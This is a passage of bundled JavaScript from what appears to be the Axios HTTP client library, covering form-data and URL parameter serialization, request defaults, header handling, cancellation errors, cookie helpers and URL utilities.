                    !((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(el) || el === null) && formData.append(// eslint-disable-next-line no-nested-ternary
                    indexes === true ? $e6cbd383b18c9625$var$renderKey([
                        key
                    ], index, dots) : indexes === null ? key : key + "[]", convertValue(el));
                });
                return false;
            }
        }
        if ($e6cbd383b18c9625$var$isVisitable(value)) return true;
        formData.append($e6cbd383b18c9625$var$renderKey(path, key, dots), convertValue(value));
        return false;
    }
    const stack = [];
    const exposedHelpers = Object.assign($e6cbd383b18c9625$var$predicates, {
        defaultVisitor: defaultVisitor,
        convertValue: convertValue,
        isVisitable: $e6cbd383b18c9625$var$isVisitable
    });
    function build(value, path) {
        if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(value)) return;
        if (stack.indexOf(value) !== -1) throw Error("Circular reference detected in " + path.join("."));
        stack.push(value);
        (0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach(value, function each(el, key) {
            const result = !((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(el) || el === null) && visitor.call(formData, el, (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isString(key) ? key.trim() : key, path, exposedHelpers);
            if (result === true) build(el, path ? path.concat(key) : [
                key
            ]);
        });
        stack.pop();
    }
    if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isObject(obj)) throw new TypeError("data must be an object");
    build(obj);
    return formData;
}
var $e6cbd383b18c9625$export$2e2bcd8739ae039 = $e6cbd383b18c9625$var$toFormData;


"use strict";
/**
 * It encodes a string by replacing all characters that are not in the unreserved set with
 * their percent-encoded equivalents
 *
 * @param {string} str - The string to encode.
 *
 * @returns {string} The encoded string.
 */ function $f66f8c7b4f247caf$var$encode(str) {
    const charMap = {
        "!": "%21",
        "'": "%27",
        "(": "%28",
        ")": "%29",
        "~": "%7E",
        "%20": "+",
        "%00": "\x00"
    };
    return encodeURIComponent(str).replace(/[!'()~]|%20|%00/g, function replacer(match) {
        return charMap[match];
    });
}
/**
 * It takes a params object and converts it to a FormData object
 *
 * @param {Object<string, any>} params - The parameters to be converted to a FormData object.
 * @param {Object<string, any>} options - The options object passed to the Axios constructor.
 *
 * @returns {void}
 */ function $f66f8c7b4f247caf$var$AxiosURLSearchParams(params, options) {
    this._pairs = [];
    params && (0, $e6cbd383b18c9625$export$2e2bcd8739ae039)(params, this, options);
}
const $f66f8c7b4f247caf$var$prototype = $f66f8c7b4f247caf$var$AxiosURLSearchParams.prototype;
$f66f8c7b4f247caf$var$prototype.append = function append(name, value) {
    this._pairs.push([
        name,
        value
    ]);
};
$f66f8c7b4f247caf$var$prototype.toString = function toString(encoder) {
    const _encode = encoder ? function(value) {
        return encoder.call(this, value, $f66f8c7b4f247caf$var$encode);
    } : $f66f8c7b4f247caf$var$encode;
    return this._pairs.map(function each(pair) {
        return _encode(pair[0]) + "=" + _encode(pair[1]);
    }, "").join("&");
};
var $f66f8c7b4f247caf$export$2e2bcd8739ae039 = $f66f8c7b4f247caf$var$AxiosURLSearchParams;


"use strict";
/**
 * It replaces all instances of the characters `:`, `$`, `,`, `+`, `[`, and `]` with their
 * URI encoded counterparts
 *
 * @param {string} val The value to be encoded.
 *
 * @returns {string} The encoded value.
 */ function $8df8fedf1c1e4428$var$encode(val) {
    return encodeURIComponent(val).replace(/%3A/gi, ":").replace(/%24/g, "$").replace(/%2C/gi, ",").replace(/%20/g, "+").replace(/%5B/gi, "[").replace(/%5D/gi, "]");
}
function $8df8fedf1c1e4428$export$2e2bcd8739ae039(url, params, options) {
    /*eslint no-param-reassign:0*/ if (!params) return url;
    const _encode = options && options.encode || $8df8fedf1c1e4428$var$encode;
    const serializeFn = options && options.serialize;
    let serializedParams;
    if (serializeFn) serializedParams = serializeFn(params, options);
    else serializedParams = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isURLSearchParams(params) ? params.toString() : new (0, $f66f8c7b4f247caf$export$2e2bcd8739ae039)(params, options).toString(_encode);
    if (serializedParams) {
        const hashmarkIndex = url.indexOf("#");
        if (hashmarkIndex !== -1) url = url.slice(0, hashmarkIndex);
        url += (url.indexOf("?") === -1 ? "?" : "&") + serializedParams;
    }
    return url;
}



"use strict";
class $5de878cd737ef277$var$InterceptorManager {
    constructor(){
        this.handlers = [];
    }
    /**
   * Add a new interceptor to the stack
   *
   * @param {Function} fulfilled The function to handle `then` for a `Promise`
   * @param {Function} rejected The function to handle `reject` for a `Promise`
   *
   * @return {Number} An ID used to remove interceptor later
   */ use(fulfilled, rejected, options) {
        this.handlers.push({
            fulfilled: fulfilled,
            rejected: rejected,
            synchronous: options ? options.synchronous : false,
            runWhen: options ? options.runWhen : null
        });
        return this.handlers.length - 1;
    }
    /**
   * Remove an interceptor from the stack
   *
   * @param {Number} id The ID that was returned by `use`
   *
   * @returns {Boolean} `true` if the interceptor was removed, `false` otherwise
   */ eject(id) {
        if (this.handlers[id]) this.handlers[id] = null;
    }
    /**
   * Clear all interceptors from the stack
   *
   * @returns {void}
   */ clear() {
        if (this.handlers) this.handlers = [];
    }
    /**
   * Iterate over all the registered interceptors
   *
   * This method is particularly useful for skipping over any
   * interceptors that may have become `null` calling `eject`.
   *
   * @param {Function} fn The function to call for each interceptor
   *
   * @returns {void}
   */ forEach(fn) {
        (0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach(this.handlers, function forEachHandler(h) {
            if (h !== null) fn(h);
        });
    }
}
var $5de878cd737ef277$export$2e2bcd8739ae039 = $5de878cd737ef277$var$InterceptorManager;





"use strict";
var $51466d41a76e5b4b$export$2e2bcd8739ae039 = {
    silentJSONParsing: true,
    forcedJSONParsing: true,
    clarifyTimeoutError: false
};






"use strict";
var $6eeff4490c995137$export$2e2bcd8739ae039 = typeof URLSearchParams !== "undefined" ? URLSearchParams : (0, $f66f8c7b4f247caf$export$2e2bcd8739ae039);


"use strict";
var $86d275a264afb13f$export$2e2bcd8739ae039 = typeof FormData !== "undefined" ? FormData : null;


"use strict";
var $59c79e94740631e4$export$2e2bcd8739ae039 = typeof Blob !== "undefined" ? Blob : null;


/**
 * Determine if we're running in a standard browser environment
 *
 * This allows axios to run in a web worker, and react-native.
 * Both environments support XMLHttpRequest, but not fully standard globals.
 *
 * web workers:
 *  typeof window -> undefined
 *  typeof document -> undefined
 *
 * react-native:
 *  navigator.product -> 'ReactNative'
 * nativescript
 *  navigator.product -> 'NativeScript' or 'NS'
 *
 * @returns {boolean}
 */ const $2f71637df772b183$var$isStandardBrowserEnv = (()=>{
    let product;
    if (typeof navigator !== "undefined" && ((product = navigator.product) === "ReactNative" || product === "NativeScript" || product === "NS")) return false;
    return typeof window !== "undefined" && typeof document !== "undefined";
})();
/**
 * Determine if we're running in a standard browser webWorker environment
 *
 * Although the `isStandardBrowserEnv` method indicates that
 * `allows axios to run in a web worker`, the WebWorker will still be
 * filtered out due to its judgment standard
 * `typeof window !== 'undefined' && typeof document !== 'undefined'`.
 * This leads to a problem when axios post `FormData` in webWorker
 */ const $2f71637df772b183$var$isStandardBrowserWebWorkerEnv = (()=>{
    return typeof WorkerGlobalScope !== "undefined" && // eslint-disable-next-line no-undef
    self instanceof WorkerGlobalScope && typeof self.importScripts === "function";
})();
var $2f71637df772b183$export$2e2bcd8739ae039 = {
    isBrowser: true,
    classes: {
        URLSearchParams: $6eeff4490c995137$export$2e2bcd8739ae039,
        FormData: $86d275a264afb13f$export$2e2bcd8739ae039,
        Blob: $59c79e94740631e4$export$2e2bcd8739ae039
    },
    isStandardBrowserEnv: $2f71637df772b183$var$isStandardBrowserEnv,
    isStandardBrowserWebWorkerEnv: $2f71637df772b183$var$isStandardBrowserWebWorkerEnv,
    protocols: [
        "http",
        "https",
        "file",
        "blob",
        "url",
        "data"
    ]
};


"use strict";
function $f6f250f62cadb740$export$2e2bcd8739ae039(data, options) {
    return (0, $e6cbd383b18c9625$export$2e2bcd8739ae039)(data, new (0, $2f71637df772b183$export$2e2bcd8739ae039).classes.URLSearchParams(), Object.assign({
        visitor: function(value, key, path, helpers) {
            if ((0, $2f71637df772b183$export$2e2bcd8739ae039).isNode && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isBuffer(value)) {
                this.append(key, value.toString("base64"));
                return false;
            }
            return helpers.defaultVisitor.apply(this, arguments);
        }
    }, options));
}




"use strict";
/**
 * It takes a string like `foo[x][y][z]` and returns an array like `['foo', 'x', 'y', 'z']
 *
 * @param {string} name - The name of the property to get.
 *
 * @returns An array of strings.
 */ function $5f8142930b3b943f$var$parsePropPath(name) {
    // foo[x][y][z]
    // foo.x.y.z
    // foo-x-y-z
    // foo x y z
    return (0, $c319b2c832c2914a$export$2e2bcd8739ae039).matchAll(/\w+|\[(\w*)]/g, name).map((match)=>{
        return match[0] === "[]" ? "" : match[1] || match[0];
    });
}
/**
 * Convert an array to an object.
 *
 * @param {Array<any>} arr - The array to convert to an object.
 *
 * @returns An object with the same keys and values as the array.
 */ function $5f8142930b3b943f$var$arrayToObject(arr) {
    const obj = {};
    const keys = Object.keys(arr);
    let i;
    const len = keys.length;
    let key;
    for(i = 0; i < len; i++){
        key = keys[i];
        obj[key] = arr[key];
    }
    return obj;
}
/**
 * It takes a FormData object and returns a JavaScript object
 *
 * @param {string} formData The FormData object to convert to JSON.
 *
 * @returns {Object<string, any> | null} The converted object.
 */ function $5f8142930b3b943f$var$formDataToJSON(formData) {
    function buildPath(path, value, target, index) {
        let name = path[index++];
        const isNumericKey = Number.isFinite(+name);
        const isLast = index >= path.length;
        name = !name && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(target) ? target.length : name;
        if (isLast) {
            if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).hasOwnProp(target, name)) target[name] = [
                target[name],
                value
            ];
            else target[name] = value;
            return !isNumericKey;
        }
        if (!target[name] || !(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isObject(target[name])) target[name] = [];
        const result = buildPath(path, value, target[name], index);
        if (result && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(target[name])) target[name] = $5f8142930b3b943f$var$arrayToObject(target[name]);
        return !isNumericKey;
    }
    if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFormData(formData) && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFunction(formData.entries)) {
        const obj = {};
        (0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEachEntry(formData, (name, value)=>{
            buildPath($5f8142930b3b943f$var$parsePropPath(name), value, obj, 0);
        });
        return obj;
    }
    return null;
}
var $5f8142930b3b943f$export$2e2bcd8739ae039 = $5f8142930b3b943f$var$formDataToJSON;


"use strict";
const $843bf0209bc94df8$var$DEFAULT_CONTENT_TYPE = {
    "Content-Type": undefined
};
/**
 * It takes a string, tries to parse it, and if it fails, it returns the stringified version
 * of the input
 *
 * @param {any} rawValue - The value to be stringified.
 * @param {Function} parser - A function that parses a string into a JavaScript object.
 * @param {Function} encoder - A function that takes a value and returns a string.
 *
 * @returns {string} A stringified version of the rawValue.
 */ function $843bf0209bc94df8$var$stringifySafely(rawValue, parser, encoder) {
    if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isString(rawValue)) try {
        (parser || JSON.parse)(rawValue);
        return (0, $c319b2c832c2914a$export$2e2bcd8739ae039).trim(rawValue);
    } catch (e) {
        if (e.name !== "SyntaxError") throw e;
    }
    return (encoder || JSON.stringify)(rawValue);
}
const $843bf0209bc94df8$var$defaults = {
    transitional: (0, $51466d41a76e5b4b$export$2e2bcd8739ae039),
    adapter: [
        "xhr",
        "http"
    ],
    transformRequest: [
        function transformRequest(data, headers) {
            const contentType = headers.getContentType() || "";
            const hasJSONContentType = contentType.indexOf("application/json") > -1;
            const isObjectPayload = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isObject(data);
            if (isObjectPayload && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isHTMLForm(data)) data = new FormData(data);
            const isFormData = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFormData(data);
            if (isFormData) {
                if (!hasJSONContentType) return data;
                return hasJSONContentType ? JSON.stringify((0, $5f8142930b3b943f$export$2e2bcd8739ae039)(data)) : data;
            }
            if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArrayBuffer(data) || (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isBuffer(data) || (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isStream(data) || (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFile(data) || (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isBlob(data)) return data;
            if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArrayBufferView(data)) return data.buffer;
            if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isURLSearchParams(data)) {
                headers.setContentType("application/x-www-form-urlencoded;charset=utf-8", false);
                return data.toString();
            }
            let isFileList;
            if (isObjectPayload) {
                if (contentType.indexOf("application/x-www-form-urlencoded") > -1) return (0, $f6f250f62cadb740$export$2e2bcd8739ae039)(data, this.formSerializer).toString();
                if ((isFileList = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFileList(data)) || contentType.indexOf("multipart/form-data") > -1) {
                    const _FormData = this.env && this.env.FormData;
                    return (0, $e6cbd383b18c9625$export$2e2bcd8739ae039)(isFileList ? {
                        "files[]": data
                    } : data, _FormData && new _FormData(), this.formSerializer);
                }
            }
            if (isObjectPayload || hasJSONContentType) {
                headers.setContentType("application/json", false);
                return $843bf0209bc94df8$var$stringifySafely(data);
            }
            return data;
        }
    ],
    transformResponse: [
        function transformResponse(data) {
            const transitional = this.transitional || $843bf0209bc94df8$var$defaults.transitional;
            const forcedJSONParsing = transitional && transitional.forcedJSONParsing;
            const JSONRequested = this.responseType === "json";
            if (data && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isString(data) && (forcedJSONParsing && !this.responseType || JSONRequested)) {
                const silentJSONParsing = transitional && transitional.silentJSONParsing;
                const strictJSONParsing = !silentJSONParsing && JSONRequested;
                try {
                    return JSON.parse(data);
                } catch (e) {
                    if (strictJSONParsing) {
                        if (e.name === "SyntaxError") throw (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).from(e, (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ERR_BAD_RESPONSE, this, null, this.response);
                        throw e;
                    }
                }
            }
            return data;
        }
    ],
    /**
   * A timeout in milliseconds to abort a request. If set to 0 (default) a
   * timeout is not created.
   */ timeout: 0,
    xsrfCookieName: "XSRF-TOKEN",
    xsrfHeaderName: "X-XSRF-TOKEN",
    maxContentLength: -1,
    maxBodyLength: -1,
    env: {
        FormData: (0, $2f71637df772b183$export$2e2bcd8739ae039).classes.FormData,
        Blob: (0, $2f71637df772b183$export$2e2bcd8739ae039).classes.Blob
    },
    validateStatus: function validateStatus(status) {
        return status >= 200 && status < 300;
    },
    headers: {
        common: {
            "Accept": "application/json, text/plain, */*"
        }
    }
};
(0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach([
    "delete",
    "get",
    "head"
], function forEachMethodNoData(method) {
    $843bf0209bc94df8$var$defaults.headers[method] = {};
});
(0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach([
    "post",
    "put",
    "patch"
], function forEachMethodWithData(method) {
    $843bf0209bc94df8$var$defaults.headers[method] = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).merge($843bf0209bc94df8$var$DEFAULT_CONTENT_TYPE);
});
var $843bf0209bc94df8$export$2e2bcd8739ae039 = $843bf0209bc94df8$var$defaults;




"use strict";
// RawAxiosHeaders whose duplicates are ignored by node
// c.f. https://nodejs.org/api/http.html#http_message_headers
const $fc026bbf9ee156f1$var$ignoreDuplicateOf = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).toObjectSet([
    "age",
    "authorization",
    "content-length",
    "content-type",
    "etag",
    "expires",
    "from",
    "host",
    "if-modified-since",
    "if-unmodified-since",
    "last-modified",
    "location",
    "max-forwards",
    "proxy-authorization",
    "referer",
    "retry-after",
    "user-agent"
]);
var /**
 * Parse headers into an object
 *
 * ```
 * Date: Wed, 27 Aug 2014 08:58:49 GMT
 * Content-Type: application/json
 * Connection: keep-alive
 * Transfer-Encoding: chunked
 * ```
 *
 * @param {String} rawHeaders Headers needing to be parsed
 *
 * @returns {Object} Headers parsed into an object
 */ $fc026bbf9ee156f1$export$2e2bcd8739ae039 = (rawHeaders)=>{
    const parsed = {};
    let key;
    let val;
    let i;
    rawHeaders && rawHeaders.split("\n").forEach(function parser(line) {
        i = line.indexOf(":");
        key = line.substring(0, i).trim().toLowerCase();
        val = line.substring(i + 1).trim();
        if (!key || parsed[key] && $fc026bbf9ee156f1$var$ignoreDuplicateOf[key]) return;
        if (key === "set-cookie") {
            if (parsed[key]) parsed[key].push(val);
            else parsed[key] = [
                val
            ];
        } else parsed[key] = parsed[key] ? parsed[key] + ", " + val : val;
    });
    return parsed;
};


"use strict";
const $866cce54f6bdfb0c$var$$internals = Symbol("internals");
function $866cce54f6bdfb0c$var$normalizeHeader(header) {
    return header && String(header).trim().toLowerCase();
}
function $866cce54f6bdfb0c$var$normalizeValue(value) {
    if (value === false || value == null) return value;
    return (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(value) ? value.map($866cce54f6bdfb0c$var$normalizeValue) : String(value);
}
function $866cce54f6bdfb0c$var$parseTokens(str) {
    const tokens = Object.create(null);
    const tokensRE = /([^\s,;=]+)\s*(?:=\s*([^,;]+))?/g;
    let match;
    while(match = tokensRE.exec(str))tokens[match[1]] = match[2];
    return tokens;
}
const $866cce54f6bdfb0c$var$isValidHeaderName = (str)=>/^[-_a-zA-Z0-9^`|~,!#$%&'*+.]+$/.test(str.trim());
function $866cce54f6bdfb0c$var$matchHeaderValue(context, value, header, filter, isHeaderNameFilter) {
    if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFunction(filter)) return filter.call(this, value, header);
    if (isHeaderNameFilter) value = header;
    if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isString(value)) return;
    if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isString(filter)) return value.indexOf(filter) !== -1;
    if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isRegExp(filter)) return filter.test(value);
}
function $866cce54f6bdfb0c$var$formatHeader(header) {
    return header.trim().toLowerCase().replace(/([a-z\d])(\w*)/g, (w, char, str)=>{
        return char.toUpperCase() + str;
    });
}
function $866cce54f6bdfb0c$var$buildAccessors(obj, header) {
    const accessorName = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).toCamelCase(" " + header);
    [
        "get",
        "set",
        "has"
    ].forEach((methodName)=>{
        Object.defineProperty(obj, methodName + accessorName, {
            value: function(arg1, arg2, arg3) {
                return this[methodName].call(this, header, arg1, arg2, arg3);
            },
            configurable: true
        });
    });
}
class $866cce54f6bdfb0c$var$AxiosHeaders {
    constructor(headers){
        headers && this.set(headers);
    }
    set(header, valueOrRewrite, rewrite) {
        const self = this;
        function setHeader(_value, _header, _rewrite) {
            const lHeader = $866cce54f6bdfb0c$var$normalizeHeader(_header);
            if (!lHeader) throw new Error("header name must be a non-empty string");
            const key = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).findKey(self, lHeader);
            if (!key || self[key] === undefined || _rewrite === true || _rewrite === undefined && self[key] !== false) self[key || _header] = $866cce54f6bdfb0c$var$normalizeValue(_value);
        }
        const setHeaders = (headers, _rewrite)=>(0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach(headers, (_value, _header)=>setHeader(_value, _header, _rewrite));
        if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isPlainObject(header) || header instanceof this.constructor) setHeaders(header, valueOrRewrite);
        else if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isString(header) && (header = header.trim()) && !$866cce54f6bdfb0c$var$isValidHeaderName(header)) setHeaders((0, $fc026bbf9ee156f1$export$2e2bcd8739ae039)(header), valueOrRewrite);
        else header != null && setHeader(valueOrRewrite, header, rewrite);
        return this;
    }
    get(header, parser) {
        header = $866cce54f6bdfb0c$var$normalizeHeader(header);
        if (header) {
            const key = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).findKey(this, header);
            if (key) {
                const value = this[key];
                if (!parser) return value;
                if (parser === true) return $866cce54f6bdfb0c$var$parseTokens(value);
                if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFunction(parser)) return parser.call(this, value, key);
                if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isRegExp(parser)) return parser.exec(value);
                throw new TypeError("parser must be boolean|regexp|function");
            }
        }
    }
    has(header, matcher) {
        header = $866cce54f6bdfb0c$var$normalizeHeader(header);
        if (header) {
            const key = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).findKey(this, header);
            return !!(key && this[key] !== undefined && (!matcher || $866cce54f6bdfb0c$var$matchHeaderValue(this, this[key], key, matcher)));
        }
        return false;
    }
    delete(header, matcher) {
        const self = this;
        let deleted = false;
        function deleteHeader(_header) {
            _header = $866cce54f6bdfb0c$var$normalizeHeader(_header);
            if (_header) {
                const key = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).findKey(self, _header);
                if (key && (!matcher || $866cce54f6bdfb0c$var$matchHeaderValue(self, self[key], key, matcher))) {
                    delete self[key];
                    deleted = true;
                }
            }
        }
        if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(header)) header.forEach(deleteHeader);
        else deleteHeader(header);
        return deleted;
    }
    clear(matcher) {
        const keys = Object.keys(this);
        let i = keys.length;
        let deleted = false;
        while(i--){
            const key = keys[i];
            if (!matcher || $866cce54f6bdfb0c$var$matchHeaderValue(this, this[key], key, matcher, true)) {
                delete this[key];
                deleted = true;
            }
        }
        return deleted;
    }
    normalize(format) {
        const self = this;
        const headers = {};
        (0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach(this, (value, header)=>{
            const key = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).findKey(headers, header);
            if (key) {
                self[key] = $866cce54f6bdfb0c$var$normalizeValue(value);
                delete self[header];
                return;
            }
            const normalized = format ? $866cce54f6bdfb0c$var$formatHeader(header) : String(header).trim();
            if (normalized !== header) delete self[header];
            self[normalized] = $866cce54f6bdfb0c$var$normalizeValue(value);
            headers[normalized] = true;
        });
        return this;
    }
    concat(...targets) {
        return this.constructor.concat(this, ...targets);
    }
    toJSON(asStrings) {
        const obj = Object.create(null);
        (0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach(this, (value, header)=>{
            value != null && value !== false && (obj[header] = asStrings && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(value) ? value.join(", ") : value);
        });
        return obj;
    }
    [Symbol.iterator]() {
        return Object.entries(this.toJSON())[Symbol.iterator]();
    }
    toString() {
        return Object.entries(this.toJSON()).map(([header, value])=>header + ": " + value).join("\n");
    }
    get [Symbol.toStringTag]() {
        return "AxiosHeaders";
    }
    static from(thing) {
        return thing instanceof this ? thing : new this(thing);
    }
    static concat(first, ...targets) {
        const computed = new this(first);
        targets.forEach((target)=>computed.set(target));
        return computed;
    }
    static accessor(header) {
        const internals = this[$866cce54f6bdfb0c$var$$internals] = this[$866cce54f6bdfb0c$var$$internals] = {
            accessors: {}
        };
        const accessors = internals.accessors;
        const prototype = this.prototype;
        function defineAccessor(_header) {
            const lHeader = $866cce54f6bdfb0c$var$normalizeHeader(_header);
            if (!accessors[lHeader]) {
                $866cce54f6bdfb0c$var$buildAccessors(prototype, _header);
                accessors[lHeader] = true;
            }
        }
        (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(header) ? header.forEach(defineAccessor) : defineAccessor(header);
        return this;
    }
}
$866cce54f6bdfb0c$var$AxiosHeaders.accessor([
    "Content-Type",
    "Content-Length",
    "Accept",
    "Accept-Encoding",
    "User-Agent",
    "Authorization"
]);
(0, $c319b2c832c2914a$export$2e2bcd8739ae039).freezeMethods($866cce54f6bdfb0c$var$AxiosHeaders.prototype);
(0, $c319b2c832c2914a$export$2e2bcd8739ae039).freezeMethods($866cce54f6bdfb0c$var$AxiosHeaders);
var $866cce54f6bdfb0c$export$2e2bcd8739ae039 = $866cce54f6bdfb0c$var$AxiosHeaders;


"use strict";
function $5cf10c777cce5f4f$export$2e2bcd8739ae039(fns, response) {
    const config = this || (0, $843bf0209bc94df8$export$2e2bcd8739ae039);
    const context = response || config;
    const headers = (0, $866cce54f6bdfb0c$export$2e2bcd8739ae039).from(context.headers);
    let data = context.data;
    (0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach(fns, function transform(fn) {
        data = fn.call(config, data, headers.normalize(), response ? response.status : undefined);
    });
    headers.normalize();
    return data;
}


"use strict";
function $5a60afef8b0dd173$export$2e2bcd8739ae039(value) {
    return !!(value && value.__CANCEL__);
}





"use strict";
/**
 * A `CanceledError` is an object that is thrown when an operation is canceled.
 *
 * @param {string=} message The message.
 * @param {Object=} config The config.
 * @param {Object=} request The request.
 *
 * @returns {CanceledError} The created error.
 */ function $9fd0919e266b4fda$var$CanceledError(message, config, request) {
    // eslint-disable-next-line no-eq-null,eqeqeq
    (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).call(this, message == null ? "canceled" : message, (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ERR_CANCELED, config, request);
    this.name = "CanceledError";
}
(0, $c319b2c832c2914a$export$2e2bcd8739ae039).inherits($9fd0919e266b4fda$var$CanceledError, (0, $4e2395edb77acf3a$export$2e2bcd8739ae039), {
    __CANCEL__: true
});
var $9fd0919e266b4fda$export$2e2bcd8739ae039 = $9fd0919e266b4fda$var$CanceledError;







"use strict";
function $ecb62d5372993dcf$export$2e2bcd8739ae039(resolve, reject, response) {
    const validateStatus = response.config.validateStatus;
    if (!response.status || !validateStatus || validateStatus(response.status)) resolve(response);
    else reject(new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)("Request failed with status code " + response.status, [
        (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ERR_BAD_REQUEST,
        (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ERR_BAD_RESPONSE
    ][Math.floor(response.status / 100) - 4], response.config, response.request, response));
}




"use strict";
var $65cc14c0704b5541$export$2e2bcd8739ae039 = (0, $2f71637df772b183$export$2e2bcd8739ae039).isStandardBrowserEnv ? // Standard browser envs support document.cookie
function standardBrowserEnv() {
    return {
        write: function write(name, value, expires, path, domain, secure) {
            const cookie = [];
            cookie.push(name + "=" + encodeURIComponent(value));
            if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isNumber(expires)) cookie.push("expires=" + new Date(expires).toGMTString());
            if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isString(path)) cookie.push("path=" + path);
            if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isString(domain)) cookie.push("domain=" + domain);
            if (secure === true) cookie.push("secure");
            document.cookie = cookie.join("; ");
        },
        read: function read(name) {
            const match = document.cookie.match(new RegExp("(^|;\\s*)(" + name + ")=([^;]*)"));
            return match ? decodeURIComponent(match[3]) : null;
        },
        remove: function remove(name) {
            this.write(name, "", Date.now() - 86400000);
        }
    };
}() : // Non standard browser env (web workers, react-native) lack needed support.
function nonStandardBrowserEnv() {
    return {
        write: function write() {},
        read: function read() {
            return null;
        },
        remove: function remove() {}
    };
}();



"use strict";
function $8fa91c1a59edb5d9$export$2e2bcd8739ae039(url) {
    // A URL is considered absolute if it begins with "<scheme>://" or "//" (protocol-relative URL).
    // RFC 3986 defines scheme name as a sequence of characters beginning with a letter and followed
    // by any combination of letters, digits, plus, period, or hyphen.
    return /^([a-z][a-z\d+\-.]*:)?\/\//i.test(url);
}


"use strict";
function $b63e12c1e0b9e0be$export$2e2bcd8739ae039(baseURL, relativeURL) {
    return relativeURL ? baseURL.replace(/\/+$/, "") + "/" + relativeURL.replace(/^\/+/, "") : baseURL;
}


"use strict";
function $598acbfafd2c63c5$export$2e2bcd8739ae039(baseURL, requestedURL) {
    if (baseURL && !(0, $8fa91c1a59edb5d9$export$2e2bcd8739ae039)(requestedURL)) return (0, $b63e12c1e0b9e0be$export$2e2bcd8739ae039)(baseURL, requestedURL);
    return requestedURL;
}




"use strict";
var $5eb63b558e1fb85a$export$2e2bcd8739ae039 = (0, $2f71637df772b183$export$2e2bcd8739ae039).isStandardBrowserEnv ? // Standard browser envs have full support of the APIs needed to test
// whether the request URL is of the same origin as current location.
function standardBrowserEnv() {
    const msie = /(msie|trident)/i.test(navigator.userAgent);
    const urlParsingNode = document.createElement("a");
    let originURL;
    /**
    * Parse a URL to discover it's components
    *
    * @param {String} url The URL to be parsed
    * @returns {Object}
    */ function resolveURL(url) {
        let href = url;
        if (msie) {
            // IE needs attribute set twice to normalize properties
            urlParsingNode.setAttribute("href", href);
            href = urlParsingNode.href;
        }
        urlParsingNode.setAttribute("href", href);
        // urlParsingNode provides the UrlUtils interface - http://url.spec.whatwg.org/#urlutils
        return {
            href: urlParsingNode.href,
            protocol: urlParsingNode.protocol ? urlParsingNode.protocol.replace(/:$/, "") : "",
            host: urlParsingNode.host,
            search: urlParsingNode.search ? urlParsingNode.search.replace(/^\?/, "") : "",
            hash: urlParsingNode.hash ? urlParsingNode.hash.replace(/^#/, "") : "",
            hostname: urlParsingNode.hostname,
            port: urlParsingNode.port,
            pathname: urlParsingNode.pathname.charAt(0) === "/" ? urlParsingNode.pathname : "/" + urlParsingNode.pathname
        };
    }
    originURL = resolveURL(window.location.href);
    /**
    * Determine if a URL shares the same origin as the current location
    *
    * @param {String} requestURL The URL to test
    * @returns {boolean} True if URL shares the same origin, otherwise false
    */ return function isURLSameOrigin(requestURL) {
        const parsed = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isString(requestURL) ? resolveURL(requestURL) : requestURL;
